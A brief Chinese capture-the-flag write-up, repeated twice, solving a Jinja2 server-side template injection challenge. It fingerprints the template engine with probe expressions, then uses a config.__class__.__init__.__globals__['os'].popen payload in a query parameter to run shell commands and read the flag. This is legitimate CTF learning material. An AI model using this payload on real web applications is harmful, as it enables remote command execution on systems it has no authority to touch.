题目:
题目提示为ssti,先判断使用的模板;注入${77},未返回49,继续注入{{77}},返回49,再注入{{7*‘7’}},返回7777777,判断为jinja2模板。
通过config调用os尝试
?flag={{config.__class__.__init__.__globals__['os'].popen('ls ..').read()}}
逐个查看目录
发现存在flag文件,打开后得到答案。
题目:
题目提示为ssti,先判断使用的模板;注入${77},未返回49,继续注入{{77}},返回49,再注入{{7*‘7’}},返回7777777,判断为jinja2模板。
通过config调用os尝试
?flag={{config.__class__.__init__.__globals__['os'].popen('ls ..').read()}}
逐个查看目录
发现存在flag文件,打开后得到答案。